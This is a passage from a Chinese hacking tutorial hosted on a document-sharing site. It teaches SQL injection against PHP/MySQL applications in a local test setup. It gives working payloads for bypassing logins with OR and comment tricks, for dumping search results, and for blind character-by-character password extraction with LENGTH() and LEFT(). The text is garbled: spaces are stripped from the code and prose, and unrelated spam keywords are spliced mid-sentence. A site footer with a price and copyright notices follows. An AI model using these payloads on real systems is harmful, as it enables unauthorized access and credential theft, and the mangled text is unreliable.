gumentisnotavalidMySQLresultresourceinF:injectionuser.phponline13登陆失败SQLQuery:SELECT*FROMuserWHEREusername='angel'or1=1'ANDpassword=''PHPWarning:mysql_fetch_array():suppliedargumentisnotavalidMySQLresultresourceinF:injectionuser.phponline13看到了吗?单引号闭合后,并没有注释掉后面的单引号,导致单引号没有正确配对,所以由此可知我们构造的语句不能让Mysql正确执行,要重新构造:127.0.0.1/injection/user.php?username=angel'or'1=1这时显示"登陆成功",说明成功了。或者提交:127.0.0.1/injection/user.php?username=angel'/*127.0.0.1/injection/user.php?username=angel'%23这样就把后面的语句给注释掉了!说说这两种提交的不同之处,我们提交的第一句是利用逻辑运算,在ASP中运用可以说是非常广泛的,这个不用说了吧?第二、三句是根据mysql的特性,mysql支持/*和#两种注释格式,所以我们提交的时候是把后面的代码注释掉,值得注意的是由于编码问题,在IE地址栏里提交#会变成空的,所以我们在地址栏提交的时候,应该提交%23,才会变成#,就成功注释了,这个比逻辑运算简单得多了,由此可以看出PHP比ASP强大灵活多了。通过上面的例子大家应该对PHP+MYSQL的注入有个感性的认识了吧?语句构造PHP+MYSQL注入的博大精深不仅仅表达在认证体系的饶过,语句的构造才是最有趣味的地方,但构造语句和ACCESS、MSSQL都有少许不同,但同样可以发挥得淋漓尽致。看下面的例子。一、搜索引擎网上有一大堆的PHP程序搜索引擎是有问题的,也就是提交特殊字符可以显示所有记录,包括不符合条件的,其实这个危害也不算大,因为允许用户输入关键字进展模糊查询的地方大多数都允许检索所有的记录。很多查询的设计就是这样的。查询是只读的操作应该不会对数据产生破坏作用,不要太担忧。不过泄露隐私不知道算不算危害,下面是一个标准的搜索引擎:Searchresult$keywords"wasnotfoundinalltherecord.n";}else{while($article=mysql_fetch_array($result)){echo"
  • ".htmlspecialchars($article[title])."n";}//while}}else{echo"leaseentersomekeywords.n";}?>一般程序都是这样写的,如果缺乏变量检查,我们就可以改写变量,到达"注入"的目的,尽管没有危害,当我们输入"___"、".__"、"%"等类似的关键字时,会把数据库中的所有记录都取出来。如果我们在表单提交:%'ORDERBYarticleid/*%'ORDERBYarticleid#__'ORDERBYarticleid/*__'ORDERBYarticleid#SQL语句就被改变成下面的样子了,SELECT*FROMarticleWHEREtitleLIKE'%%'ORDERBYarticleid/*%'ORDERBYtitleDESCSELECT*FROMarticleWHEREtitleLIKE'%__'ORDERBYarticleid#%'ORDERBYtitleDESC就会列出所有记录,包括被隐藏的,还可以改变排列顺序。这个虽然危害不大,也算是注入的一种方式了吧?二、查询字段查询字段又可以分成两种,本表查询和跨表查询,这两种查询和ACCESS、MSSQL差不多,甚至更强大、更灵活、更方便。不知道为什么就是有人认为比ASP难?我们在ASP中经常使用的个别函数在PHP里要有小小的改动,如下:①本表查询看下面一条SQL语句,多用在论坛或者会员注册系统查看用户 资料 新概念英语资料下载李居明饿命改运学pdf成本会计期末资料社会工作导论资料工程结算所需资料清单 的,当我们提交的用户名为真时,就会正常返回用户的ID,如果为非法参数就会提示相应的错误,由于是查询用户资料,我们可以大胆猜想密码就存在这个数据表里〔现在我还没有碰见过密码是单独存在另一个表的程序〕,记得刚刚的身份验证程序吗?和现在的相比,就少了一个AND条件,如下:SELECT*FROMuserWHEREusername='$username'ANDpassword='$password'SELECT*FROMuserWHEREusername='$username'一样的就是当条件为真时,就会给出正确的提示信息,如果我们构造出后面的AND条件局部,并使这局部为真,那我们的目的也就到达了,还是利用刚刚建立的user数据库,用户名为angel,密码为mypass,看了上面的例子,应该知道构造了吧,如果我们提交:127.0.0.1/injection/user.php?username=angel'andpassword='mypass这个是绝对为真的,因为我们这样提交上面的SQL语句变成了下面的样子:SELECT*FROMuserWHEREusername='angel'ANDpassword='mypass'但在实际的攻击中,我们是肯定不知道密码的,假设我们知道数据库的各个字段,下面我们就开场探测密码了,首先获取密码长度:127.0.0.1/injection/user.php?username=angel'andLENGTH(password)='6在ACCESS中,用LEN()函数来获取字符串长度,在MYSQL中,要使用LENGTH(),只要没有构造错误,也就是说SQL语句能正常执行,那返回结果无外乎两种,不是返回用户ID,就是返回"该记录不存在"。当用户名为angel并且密码长度为6的时候返回真,就会返回相关记录,是不是和ASP里一样?再用LEFT()、RIGHT()、MID()函数猜密码:127.0.0.1/injection/user.php?username=angel'andLEFT(password,1)='m127.0.0.1/injection/user.php?username=angel'andLEFT(password,2)='my127.0.0.1/injection/user.php?username=angel'andLEFT(password,3)='myp127.0.0.1/injection/user.php?username=angel'andLEFT(password,4)='mypa127.0.0.1/injection/user.php?username=angel'andLEFT(password
  • 本文档为【从零开始学习黑客技术入门教程基础】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
    该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
    [版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
    本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
    网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
    下载需要: ¥18.4 已有0 人下载
    最新资料
    资料动态
    专题动态
    个人认证用户
    pyaiw
    擅长施工管理及辅助设计,并对施工技术、质量与安全的深入研究
    格式:doc
    大小:892KB
    软件:Word
    页数:0
    分类:教育学
    上传时间:2021-10-15
    浏览量:52